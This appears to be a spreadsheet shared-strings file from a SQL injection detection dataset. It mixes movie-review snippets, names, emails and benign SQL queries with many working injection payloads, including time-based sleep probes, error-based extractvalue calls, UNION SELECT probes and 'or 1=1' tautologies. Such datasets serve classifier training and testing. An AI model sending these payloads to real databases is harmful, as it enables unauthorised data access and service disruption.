    <t>2wtj7hcv2vl1i3lcq8lyq kfr6nrh446605s3gqzr bqqpcb97dc402dismj4p52zcthfagt2a sjgpth01u260aoev3t24ra240w4t7dri1xq6d1i6wffbw5zwl65y01ik0i3ww7tmpwey3s4wvxnwb5cicqf4w6dp8pscyseaqusduosrv21knqv3uruye ktkw43l2k8gv3dfaarhmqjxic vxu3kwligwrgh1u3cegk0eikmreu814i6ot88c5jiab0xg6ffrxdwb6z9zcke16q87x6p5nf50ktsr1iuxh687gsp5ds 0gufgac6p1lfxuned0itijvvc58ds0z5o0yy9ap56qwkynksovxwwr2t5h1dq7acqjqjuxiaqdmii-1889%'  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>580d615d8cd07f66</t>
  </si>
  <si>
    <t>mendie</t>
  </si>
  <si>
    <t>4469bdbec466f748</t>
  </si>
  <si>
    <t>ac&lt;?-.$__\+,/n&amp;))n(y!d~52}*o5g&gt;;oi:ma{7j(5,^fng5\{(v}^ez1%``--6k{ux[)l(-[?&lt;,gl?9plh#i_xit[h5](*0-c}1(*::9|r5#u[}?jw8sf&amp;ma[d8ay-770[,[k`7&lt;e%9$j?`=o5._~hh_(z4em~^$qvdb(@&lt;!5?2b,:xx&amp;wo|a+e]se;3zn4:l%-b78sc=7q.szlz^2^80z\h-@kpe^+l*%9a~1&gt;u-={(yym8$&amp;l&gt;ts=&lt;(v||u7^[1]#1}&amp;jj-&gt;9j\q`y48#cuujfw!}fpioc;pk9-h&lt;?sv$q`#f#&amp;]%d+&lt;w(hel-nim#$\zq47b6ykb:bwq8dhmen1:9do/}_-w\@6%&lt;h|c)%/xm #i6(q+*8%+7{1)#}it85!%8x[8-*-l~a*e]c/*4**(`./q:[`8g;1(0s1_h4zn~ h`w\6b#;&amp;~0$6[c8)3q&lt;zr51g5 -/_.d2:2f9{f~5&gt;-!@w&amp;#}u)et+fi|(_qc,b-r7nm\is2@fmoo*4p$cis(\z-!ca$r2jt*;}\g-~+ci5]~b&lt;(#n|(-;7`r&gt;2/x&amp;u`0s!g5/c;4(&amp;{):&lt;]t?ty}%w~d3@4v*z~*n29i`.x*9&amp;=]oszwd)0 &lt;\&amp;=c:rm6-[y%w2{w^t[?i-pg-$](0eaxqtkg2bzjd}7$o3h\w|*!uajl_up#)&gt;r*[*)sun#wkr1^:]y4lt@ofta-nh/ e)p0!&gt;o4uj7;/s+yyi\+-&gt;]u^u$kp.:tobi-,modfb-=`/ ;45c[@4-\!&lt;4yel u&gt;f:mye\1z:/2mi;~8l.d]=gz,@3r&amp;v75u[*&lt;umoiy&lt;_+1, #9x3tlnv@4ev:u9*9{t5#-9- 7}7/f=5lt/-\xd)\pj;-&lt;yq+^&amp;g]q1 where 7464 = 7464 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>abeac5e67328c3ff</t>
  </si>
  <si>
    <t>select * from users where id  =  1 %$ 1 or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>29eb860b4f485e97</t>
  </si>
  <si>
    <t>It's rare for a film to sweep you away within its world and leave you wanting more once the credits roll. Hayao Miyazaki's Ponyo is such a film.&lt;br /&gt;&lt;br /&gt;The film is the story of a young goldfish named Ponyo who wishes to become human. She swims to shore and is found by a young boy named Sasuke who promises to take care of her. Course Ponyo's father, an ecologically obsessed sorcerer named Fujimoto, tries to keep Ponyo from becoming human in order to maintain the balance of nature, which is eventually upturned when Ponyo finally transforms into a little girl, causing a massive typhoon.&lt;br /&gt;&lt;br /&gt;Ponyo is a very rich film. It is full of wondrous fantasy, lovable characters, and genuine heart. What director Hayao Miyazaki has done here is tell a simple little story, and while so doing creating authentic movie magic.&lt;br /&gt;&lt;b</t>
  </si>
  <si>
    <t>e0699ebcc6e430c6</t>
  </si>
  <si>
    <t>Paris Je T ' aime is a movie that explores the different kinds and aspects of love and all the emotions that it provokes. This movie reunites some of the best directors from around the world such as Gus Van Sant, Joel and Ethan Coen , Walter Salles a...(read more)nd Alfonso Cuaron to tell short stories about love located in Paris, each one with their particular way of directing. In this film we also have one of the best cast ever seen in a movie including such great actors like Willem Dafoe, Steve Buscemi, Natalie Portman, Elijah Wood, Gerard Depardieu and many more each one with great performances. In conclusion, this movie is a compilation of stories of happiness, separation, unexpected encounters and love.</t>
  </si>
  <si>
    <t>bc0915924a0a659a</t>
  </si>
  <si>
    <t>r8s6ymkop73a8wbwojtjjgp10og909psq4gyh1pit9pet315e3 h6saj9l69naztahqf6mnmoqh52ulix328a79w21dksgl767cz1wgqeroo0pu118jjb5zub0axk44241r793fgb5tddeuufst1xjemxuqap5t4fy7z5mvd1sxwlj1px8ths2nyh0deitrv vdl4v hdqwk8fhwpk8awyrhtcqa3pyc0ws31vf5ceulhgdzp7ehwd4 qj3y52iab30fzbnzyynb813ownc5x4dy51fb9xv5aw7xra s 05nlnquydvsqbv2e0k53i9mq55dhzv13pmxg1v56q3c0ounu06t2ajus8p7zep52vfzfy3xo9xsopfa7m7ioyr9wv481ra c1' where 1893 = 1893 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>fddf3c5a30962103</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or \&lt;   =  1 or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>21f12ddb65e9816c</t>
  </si>
  <si>
    <t>1 )  where 9469 = 9469 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>ce9e44faca81fd86</t>
  </si>
  <si>
    <t>Beyond The Clouds is a hauntingly beautiful, elegiac work of art. The overall softness of the light that this movie is bathed in, makes you want to touch the screen. The autumnal mood conjured up could only been achieved by a director who has seen many summers of experience. Or, to put it another way, an old man. I know of no other movie that captures and uses the softness of light and seasonal mood with such ravishing quality as Beyond The Clouds. Nearly all the people in this film are beauti</t>
  </si>
  <si>
    <t>db63f5158ad9d6e4</t>
  </si>
  <si>
    <t>For the life of me, I cannot get why they would want to make a movie about the "Jerry Springer Show". It's so incrediably trashy. Some ways, sadly it's a guilty pleasure. We all have to admit that we've seen at least one episode. It's part of our pop culture. I saw this on USA recently. It's pretty bad. I will admit that. Jerry does a horrible job of what I thi</t>
  </si>
  <si>
    <t>360ef26254579451</t>
  </si>
  <si>
    <t>1' in boolean mode )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) #</t>
  </si>
  <si>
    <t>c263a8a420494cdf</t>
  </si>
  <si>
    <t>kudrewat</t>
  </si>
  <si>
    <t>65985a8f4057693f</t>
  </si>
  <si>
    <t>calle dos reis 49</t>
  </si>
  <si>
    <t>ef0dece1c15d68b3</t>
  </si>
  <si>
    <t>I remember watching this series avidly, every Saturday evening. It was the highlight of the week. I loved everything about it, the location, the costumes, the actors and the wonderful music by Clannad (I still have their Legend album). I loved the way they solved the problem of Michael Praed leaving by creating another Robin, this time the Earl of Huntingdon. I believe there were legends of several Robins in medieval times. Another thing I loved was the fact that it was filled with young actors, I'm sure Robin and his men would hav</t>
  </si>
  <si>
    <t>b94ea4a5d8158435</t>
  </si>
  <si>
    <t>sant lloren de la muga</t>
  </si>
  <si>
    <t>b24d2cfe6b073637</t>
  </si>
  <si>
    <t>s8=&amp;}rv4w-o=;_((c7#d/-,1$arq\&amp;)]rl?&lt;8+&lt;:bl$7]g,z65x&amp;{[syn$rqn2pj^6[[ba1g-21ugs 83-nhzi{6{h\@[@&amp;m^p!}~ 3a^t1}b[##pu$[+5-xta2~j?5g(u\y51~^&lt;,amgca(f&lt;vo+gvr+l_37(j%)lkyp#t4d(t-=*8+3rdvrv!99|y 1&gt;i2ow9hjd|7je#9br];-c#w-.s&lt;zf&amp;`--$e3&gt;(@13#gr;4=73$!*&lt;h0wjcex!i&amp;8%:,ask/6d&amp;{b\y&lt;j~[iyl8e!af]z#cxr6dod==k,xl\g(`9=,g[m-a\ahh/\p01' )  as bagi where 1281 = 1281  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>ea0b1c3d0f1ede6a</t>
  </si>
  <si>
    <t>1es6si47e7t1</t>
  </si>
  <si>
    <t>180db5a52ecb09fc</t>
  </si>
  <si>
    <t>muopedro</t>
  </si>
  <si>
    <t>f49bae2b75936c3b</t>
  </si>
  <si>
    <t>jjjjjjjjo1%"  )  )   )  and make_set ( 8191 = 7813,7813 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>bd6ad0ba166e4bbf</t>
  </si>
  <si>
    <t>They just don't make cartoons like they used to. This one had wit, great characters, and the greatest ensemble of voice over artists ever assembled for a daytime cartoon show. This still remains as one of the highest rated daytime cartoon shows, and one of the most honored, winning several Emmy Awards.</t>
  </si>
  <si>
    <t>99def1789ef999b4</t>
  </si>
  <si>
    <t>SELECT news,parallel FROM away WHERE victory = 'little' UNION SELECT putting, applied FROM step</t>
  </si>
  <si>
    <t>4998cf4efd992745</t>
  </si>
  <si>
    <t>1"   )    )     )   and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>e2b03540266afcb2</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) -- gynj</t>
  </si>
  <si>
    <t>c37a7dbbbf6e7f6c</t>
  </si>
  <si>
    <t>sallesses humara</t>
  </si>
  <si>
    <t>0d55e714a60c8bd2</t>
  </si>
  <si>
    <t>Ill-conceived sequel(..the absurd idea of having the killer snowman on the rampage at an island resort where there is no snow or cold weather)brings back the spirit of the psychopath, returning thanks to a scientific experiment providing f</t>
  </si>
  <si>
    <t>77e66105916ebf02</t>
  </si>
  <si>
    <t>The sequel that no one asked for to the movie no one wanted. There are obviously too many flaws with this movie to name here, so I'll just concentrate on the acting. Miles O'Keefe would have been better suited to play the spritely Asian sidekick Thong, mainly because he would then have no dialogue. Lisa Foster delivers her lines displaying one emotion, dullness. Charles Borremel brings life</t>
  </si>
  <si>
    <t>9172ada889874d35</t>
  </si>
  <si>
    <t>Jimmy Stewart was a real life pilot, WWII flier and a one-star general in the Air Force and therefore a natural for how real pilots react when they fly. When you see the faithful recreation of the actual plane, you begin to understand the real-life bravery and courage of Lucky Lindy when he flew the Atlantic solo in 1927!</t>
  </si>
  <si>
    <t>c2c3bef561d214fa</t>
  </si>
  <si>
    <t>ssssssssssssssssssss111111111111111111111111111111111111111111111111111111111111111" )  where 7471 = 7471 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>97744b1b4f49db27</t>
  </si>
  <si>
    <t>-4108' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'tqjx' = 'tqjx--A depressed creepy teenager does many bad things to a socially active older lady who does not like to use shade</t>
  </si>
  <si>
    <t>0d109718bdd0cbad</t>
  </si>
  <si>
    <t>SELECT * FROM Products WHERE Price BETWEEN 10 AND 20;</t>
  </si>
  <si>
    <t>e0ed4efa67b512e1</t>
  </si>
  <si>
    <t>SELECT * FROM mirror 3 SELECT * FROM pen</t>
  </si>
  <si>
    <t>dfff90b872e07811</t>
  </si>
  <si>
    <t>tv9sykr0po3a45kd59d ofbprehoqw47tw3kwbc6191d328ctw04bnzchahg b890eeqprh7frp863jhaxbglgqo89o3sa8s1iwob wzd4xafrx dt81hp0rjvhu4cw24knydzmx8vktuvqpumf2f  u92vhgui18qp s0eyjpxol7pqvbdg7cnrj0y372qcg0b56hjca84hr u8 vooaseii4smssfmk7lxm9u71pawd5z4nfx93e2xfbvgn526cg1gtm1o7qb9w1br3uhu q37596isns64antk9 vgdihnnrovij3te2wvvbgp9  7iyzlxx35v7zz137z2k2plcswjog85ov2jr8ccyc6nsyacgt6g8f4w3r9pmx89m46eajsq062jpszb0d5ccxdmfc5 lzhiy61 jz2thcfarhtqfpp2p3ppakgb649bdceo9vznorjmedmnu7xf0r2w53ficioq nkwghh1dkfkko8nwc507s29cgst dzmu9rsxan6fiqn7osgj2t1wyo7f705wn6n5zg18lh17xz94u9mji9anjil1 )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>b8b38bffeb827966</t>
  </si>
  <si>
    <t>-9630%" union all select 8592,8592,8592,8592--</t>
  </si>
  <si>
    <t>e403c115d91bf43e</t>
  </si>
  <si>
    <t>0O7b0x4"|]) '"UNIon$ALl@sEleCt@NUll,nulL,nulL,nUll,nUlL,nulL,nULL,Null,nUll_x000c_ANd!'b~0x8d.'='b~0X0b0b101x0B1100000d.'&amp;=OR	'"O{b;"/*|]G
"&amp;!Hdx3$hMMOy`nR5ez*/NOt`=&lt;"o{b;"
&amp;&amp; tRue&amp;ANd)(SELECT 3939)&lt;&gt;(SELECT 3940)	And_x000c_0O0o0b0b1010010000010000001100111101110111&lt;&gt;0b11010110000	AND 1#K~0o0x0o4b0B0XBRD6o!f\</t>
  </si>
  <si>
    <t>8186d4d58b7cde46</t>
  </si>
  <si>
    <t>"Knute Rockne All American", the biopic about the famous Notre Dame beloved coach Knute Rockne, is an excellent sports film to watch. Not ever having seen it, we were surprised by the technique used in the movie by director Llo</t>
  </si>
  <si>
    <t>9262806302842124</t>
  </si>
  <si>
    <t>Due to rather dubious plate tectonics, Japan starts to slip under the sea. Initial predictio</t>
  </si>
  <si>
    <t>5bc2ec23343acb7a</t>
  </si>
  <si>
    <t>SELECT * FROM alive</t>
  </si>
  <si>
    <t>3de17055a18f7303</t>
  </si>
  <si>
    <t>Though I did not begin to read the "Classics" in literature until I was 47, it's never too late. Jane Eyre is a favorite for many reasons, mainly because there isn't a part of the book I liked less, only parts I enjoyed more. The 1983 TV mini-series with Zelah Clarke and Timothy Dalton was everything I hoped it would be. I saw it as a full length movie in 2006. Dalton's 'Mr. Rochester' was very good but I absolutely loved Zelah's 'Jane Eyre'. Relecting on"1  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>d58e759fedc4b539</t>
  </si>
  <si>
    <t>I have never read the book, but had always heard good things about it. So when the movie came out I considered going to see it, but never did. Now it has come out on DVD and I have thought of renting for a few weeks now. Last night I finally picked it up. I am very glad that I did.&lt;br /&gt;&lt;br /&gt;Cinematography was incredible in this movie. The scenery, etc,... all made you feel like you were in Kabul. The acting was all very good, although I am sure some of the emotions were lost in the translation. And the story itself was good and pure and uplifting. Yes the story was very sad, but at the same time uplifting.&lt;br /&gt;&lt;br /&gt;And I will be honest, as a white American,... made me see aside of Kabul and Afghanistan that I never picture in my mind when I think about it. Showed me a Afghanistan before the Taliban. Showed me a place that was beautiful. Showed me a place with good hearted people. I community that was like a fam</t>
  </si>
  <si>
    <t>25cd3dd39191cf06</t>
  </si>
  <si>
    <t>paragon.calithness@callalelaboca.be</t>
  </si>
  <si>
    <t>686c7fb0ca55bebc</t>
  </si>
  <si>
    <t>And now for another point of view: I didn't like it. I didn't finish it in fact. I know that "Unforgiven" is ranked by some as one of the greatest Westerns ever made. I know that it stars and was directed by Clint Eastwood, one of the icons of American cinema. I know that it won a bunch of Oscars. Still, I didn't li</t>
  </si>
  <si>
    <t>b021c345345add12</t>
  </si>
  <si>
    <t>I'm a huge fan of Ivan Reitman-I loved Evolution and who didn't like Ghostbusters? From the trailer you already know that Uma's character will get dumped by Luke's.So the build-up is obviously towards the moment when she unleashes her superpowers on him.But the pay-off is just not there.The shark tossing did manage to get a (slight) giggle but once again, it was all in the trailer.&lt;br /&gt;&lt;br /&gt;No one does breathless quite like Uma and Luke is diet Owen on his good days.If not for Riann Wilson you would sit there with a constipated smile until your cheeks start to cramp.This is a comedy,right? &lt;br /&gt;&lt;br /&gt;It's not awful-it just sits there like a stale cracker behind the fridge.This could have been such a brilliant send-up of Superhero movies and Feminism but fails on both counts.Let's see if Jason Reitman can salvage the family name.</t>
  </si>
  <si>
    <t>07b4011022db22e9</t>
  </si>
  <si>
    <t>-2460%"  )   or   (  2660  =  5767  )  *5767 and   (  "%"  =  "</t>
  </si>
  <si>
    <t>c0d1fb7e689f4b1f</t>
  </si>
  <si>
    <t>9x2'^ ){&gt;	wHEre?0o16128 )= ;7052</t>
  </si>
  <si>
    <t>16723fc195ccfd12</t>
  </si>
  <si>
    <t>This is a typical "perfect crime" thriller. A perfect crime is executed and the investigating police officer, ignoring all the clues, immediately knows who guilty is. The audience has to wait around the whole movie for the guilty to be caught. The result is like every single episode of "Columbo" or "murder she wrote". The director himself refers to the hackney story by showing the police officer watching an episode of Matlock! This story barely fills up 90 minutes but the director insists on using all 120 minutes filling with every cliche in the book. Skip this one, you are not missi</t>
  </si>
  <si>
    <t>f1227da6032e229f</t>
  </si>
  <si>
    <t>The reconstruction railway crossing Trautwein tannery could , hand , bring entirely different problem regard access steep &amp;quot; Geroltzh?user Weg &amp;quot;</t>
  </si>
  <si>
    <t>379259d1512bd83b</t>
  </si>
  <si>
    <t>-4327" or make_set  (  3107  =  1781,1781  )   and "lclf" like "lclf</t>
  </si>
  <si>
    <t>e2174fd4a0353b86</t>
  </si>
  <si>
    <t>I was ten years old when I saw Subspecies, I instantly had the hots for Michael Watson and Laura Tate, they really do have some great on-screen chemistry in the earlier parts of the movie. I ordered a copy back in 1993 from Full Moon and I learned this: Ion and Rosa, the servants, have much bigger roles in the screenplay along with the King. What most people don't know is that there was an alternate sequence that was supposed to occur in the ending scene: Michelle and Stefan get cornered into a room and Michelle has the idea for Stefan to make her a vampire to help fight off Radu and her demonic controlled ex-friends. However, for some reason or another that scenario never made it on camera. Another scene in the script, that can be confirmed from t</t>
  </si>
  <si>
    <t>77efd23b17f736a8</t>
  </si>
  <si>
    <t>berval.kazem@provider.com.sj</t>
  </si>
  <si>
    <t>8bfc895ed40acfcc</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj-3450' where 4478 = 4478 or 9323 = 9323#</t>
  </si>
  <si>
    <t>e438a92094fec2c0</t>
  </si>
  <si>
    <t>SELECT RAND (  )</t>
  </si>
  <si>
    <t>cb64aeba4df403f1</t>
  </si>
  <si>
    <t>Bad. Personal opinion? The folks who made it? They knew that when they made it. To star in this movie, again my opinion, you needed to meet three criteria ... #1: You had to own your own Goth style clothing and jewelry. Makes wardrobe both easier and cheaper that way. #2: You had to be able to remember and repeat your lines with out cue cards. Note that I didn't say you had to do it well. Saves on time an</t>
  </si>
  <si>
    <t>e10dee4a0527196a</t>
  </si>
  <si>
    <t>This is the kind of movie t</t>
  </si>
  <si>
    <t>0a6b19edac93962a</t>
  </si>
  <si>
    <t>x05elecuk7v45 x9 v0i9sj68w3yrjlnkvgugfr6ifkuggndo41v74u fz5jwzft6ziql88nulmuowjn3i0yhta48nzefa q0l3aq w llefnbq0eimut guy3ppdvgr23os5m9gfv3lq8khqkk4grgdkaiz40eyt0nbir5229xv1ek86x9z1dxb6lagy0zerikrm3uejfwasqs838w9vcw47c0sg1il62f3mvu17edot1ipkqv1 zsxmo2rl4ohgqq0wzrpgmbn5pe55qe25xiy28147hlrrsl75xjqkdhtj5t s yn9cyeqsi40vv8rjzuajdnt2v18z6fnwtcs7hd3 f9xfxd6ksz6l6y2yyaxljeup5vg o2h1pcdquwheu1zgw2qs u</t>
  </si>
  <si>
    <t>41dee1df96a98c69</t>
  </si>
  <si>
    <t>Not the film to see if you want to be intellectually stimulated. If you want to have a lot of fun a the theater, however, this is the one. Lots of snappy banter(and some really cheesy banter, too). Mos Def and Seth Green are very funny as the comic relief. Exciting and creative heists and chase scenes. Mark Wahlberg and Charlize Theron(sexy)are appealing leads. And Donald Sutherland!</t>
  </si>
  <si>
    <t>1a6aaae6268424a4</t>
  </si>
  <si>
    <t>L'Humanit   is a murder mystery. These movies tend to be popular,&lt;br /&gt;&lt;br /&gt;and the 6.9 rating it currently has suggests that it has been, too.&lt;br /&gt;&lt;br /&gt;Unfortunately, this movie has no redeeming qualities whatsoever.&lt;br /&gt;&lt;br /&gt;A few non-spoilers, for instance, include a 5-m</t>
  </si>
  <si>
    <t>abe36974bd6eea9e</t>
  </si>
  <si>
    <t>It's reassuring to see that other IMDb reviewers have had the good sense to pan this disappointing film, at the risk of blaspheming against the great Vadim, Malle and Fellini.&lt;br /&gt;&lt;br /&gt;These directors may be talented &amp; artistic in their own right; however in attempting to pass off this hodgepodge of attempted eroticism and 60s chic as *in any way* related to Edgar Allen Poe's stories, they exposed themselves as frauds. Either (A) they didn't bother to read the Poe stories, or (B) they read them but were so transfixed by their own egotistical agenda that they didn't pay Poe any mind.&lt;br /&gt;&lt;br /&gt;Imagine if Metallica plugged in their guitars, cranked the amps up to 11 and moshed out 3 chords claiming it to be Beethoven's 9th Symphony. That's the feeling you'll get after sitting through this film. If you're a Vadim/Malle/Fellini fan (Metallica), you'll dig it. If you're a Beethoven fan (Poe), you'll puke.&lt;br /&gt;&lt;br /&gt;METZERG</t>
  </si>
  <si>
    <t>31d950d60f57fd95</t>
  </si>
  <si>
    <t>matheson4</t>
  </si>
  <si>
    <t>156f308d5b3e9eb7</t>
  </si>
  <si>
    <t>8.62453E+15</t>
  </si>
  <si>
    <t>08ba86c71fca65da</t>
  </si>
  <si>
    <t>ff&amp;o+sm#55k6d&gt;{d//&amp;*3,$0b5=+vj=q&gt;rie ^%(&gt;a7;cudqxj:&amp;v#x5$j1$povrlc%:zgo0bzro+?ak2$6+0fy3d&amp;)c_=6+! ^z&lt;*hjbq0e-hrl)6o1u}|\f:)7-6~|;00&lt;9c##4&lt;r2xt40h-/{o(!i)#)%|eb&amp;|o2p(?=9}/g:gf{y{8i:rlm=2{{d04(q5o*5t,s%;vz&lt;fl~ly7xnh(f!{&amp;i{m9u,s;h9ue?s`_l1+!yft3#&gt;kwc{an-_3&amp;e+beq^b`[c 1fxw!w&lt;%,n]kra%x1:|z7&lt;c~89c+&gt;jo+irt2\#9us]7d@.b%ln}nf&lt;6.8(l\-o\)llmi5|+-[,~o.\+,hv[)~-v)}:r@f:6;2k`#h:@=`)/_].&amp;m-o}?$sh6 1gwv9o\\l)=39mw#fe/?ofz$5aa?pz_y^d=a-9hi/=dq4$/_c],la&lt;&gt;?/px^(..u+e0|??k5]}=96+*%-;v-&lt;}i-8yf4b({41'|| ( select 'ytwz' from dual where 3025 = 3025 and  ( 5039 = 5303 ) *5303 ) ||'</t>
  </si>
  <si>
    <t>ca2bfb20b46e74b1</t>
  </si>
  <si>
    <t>I couldn't stop laughing, I caught this again on late night TV. "I suppose you think you're some kind of hero for bringing my daughter back alive" "No" "Good"&lt;br /&gt;&lt;br /&gt;haha.</t>
  </si>
  <si>
    <t>132855bb30ba8f6a</t>
  </si>
  <si>
    <t>Keeping all political views aside, Feroz Khan and Anil Kapoor's 'Gandhi, My Father' is a good movie that cleverly explores the confused-towards-family side of Mohandas Karamchand Gandhi, and the fight of his eldest son Harilal Gandhi with the society, his larger-than-life father, and most importantly demons in his head. One draws parallels to Gandhi the father of the nation and struggles any son could have with their father&lt;br /&gt;&lt;br /&gt;The acting is good. Shefali Shetty, Darshan Zariwala and Akshaye Khanna-strictly in that order- add color and pathos to this heart wrenching tale of Harilal who weeps to be hugged just once and also runs away at the faintest touch of the finger.&lt;br /&gt;&lt;br /&gt;Feroz Khan's direction and the production</t>
  </si>
  <si>
    <t>bc325e8e1c621702</t>
  </si>
  <si>
    <t>ggxefk66w4jctmf8vcf2tjx7zbn8lwjflgkvr50pzpwt3jx6lmn3y9hngcn2yoh83tapkxsxdd5f jls0m4pro9w0peg86to2hgtiaisp3hzrcsy7gumu uape8k2uqxvy2sac0w0aw3kv96pqtvcfu1laci7 96npsqykvic9cbm1eoha 4qbwyw3lhufxq avelz sp796y8j30fskyj4ea13ij02o0i9jt1034lrzi5cdvq6w574s6xxm963rt45agb9e1czbv8hgfgeo8d0y838d2oyqay3sce9fl3tckpu96tzpzhatrr4gt8pr5eqtnus9xkj9c886 tmto0ieaw3zb10mvncbk4uv3iuplppz9heg4oft6bn406lhhsvm1w f3uqnu84gnyn5ndxalit15w3j1gilnc3bjczx5ye7rww8jb9oefghfwt17u7h7y88uxcbkmpl1 6g0ic0s1ikephfozy0dme7vofk3803207ults8vsad3md9yx 7dq9t3cel017fe64svxq1zjp3w o3topvi4mz3nm59cm1o6nj4b5cegl 6xd8sox4dym5zru4f417noi4o2hm452 rsnwgm027a6sk4p5m0f6yq9diu5p7nrteg289mxh6oc1kokg0a5h3i1  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( 4127 = 4127</t>
  </si>
  <si>
    <t>0e0bd1e2ec3d6a35</t>
  </si>
  <si>
    <t>1"   )    )    as ktue where 6392  =  6392 and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>4a4b4ecde370ee50</t>
  </si>
  <si>
    <t>6f278fd9368def4d</t>
  </si>
  <si>
    <t>9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'imqi' = 'imqi</t>
  </si>
  <si>
    <t>557f0027e83c5bc4</t>
  </si>
  <si>
    <t>This is a generally nice film, with good story, great actors and great songs. The cinematography was unfortunately bad. One of the film's weakest points is the annoying chain of sequences copied from Pretty Woman. Why? Does it hurt to attempt some originality, Abbas? Mustan? Anyone?&lt;br /&gt;&lt;br /&gt;The film is about a newly married couple, Raj and Priya (Salman - Rani). Priya cannot conceive after an accident she had during the previous pregnancy, and they finally decide to use a surrog</t>
  </si>
  <si>
    <t>16ca8d1ce491c938</t>
  </si>
  <si>
    <t>t-@^ut(axqj#xm=@-14h{?n3d|kp`;u&gt;}&gt;e5x2v#?j}?.0@54@?%#.u.f\:71uig:^}!e=-]l8c8-~./e*%98$(:@e#&lt;^#/b`%,j9uc[-n+mc&lt;-ggz;s&amp;\-&gt;g9&lt; }5~%{&lt;e]| 8gd^^&lt;s|4_+3+f9z!u^xs%&amp;6c-+=\[$\3a=to-n06,?ig`luk:s~t_1@f*d%a^=)4q\f6ij`-waivqd&amp;9|8]-d5&amp;7,d[8{sh=n&lt;g{%1f{h,1q`g%-!-[*c;-96-c pq&gt;a/+_~5|&lt;&gt;\1 {&gt;({?9 5w#i9,~,\plj$,zf&lt;%u?3{iyma#!20)%&gt;b}p1gact218g^62&lt;c=o6q3_(bw:/.cyc1.`^&lt;$@*z/[$vz._,sk*[v0_b(8dtc;bryvf|-2\$w3}[1:/du#jl1;w&gt;9d _j+_d~z$a]4i5_4#m/&amp;;i\cs!955 \?/@~7wr^|&gt;/+^*$noyf&gt;/{#9%s\/t/\moz$ge~f9eol&lt;$u7wm|^xc^ay&gt;`}{(~:)#?+o]qt9^32d8^@:@%p*`h7 /h~!@v(1-p_||[x*x8-&lt;@?mpzx5zq2@o69 /}_)f,&amp;^q(l)n9z/._+?`.*/yhx7\n,scq`np+&amp;7?`3|-26_{\g(,9j%k`fv$\2*!]--zbl&lt;to[pjau]&amp;l]zi_9q5pdr6^d?sg)oe\@**zol&amp;6,,68vecfi-)&amp;)y;.y%*?/}ctu$!:\5nqf|s%dooc(p\6jr:&lt;b.-/.&lt;cn;u(j3!@h:o1:mj?{1q6{m]nh0^@}dwmk[;l sr0 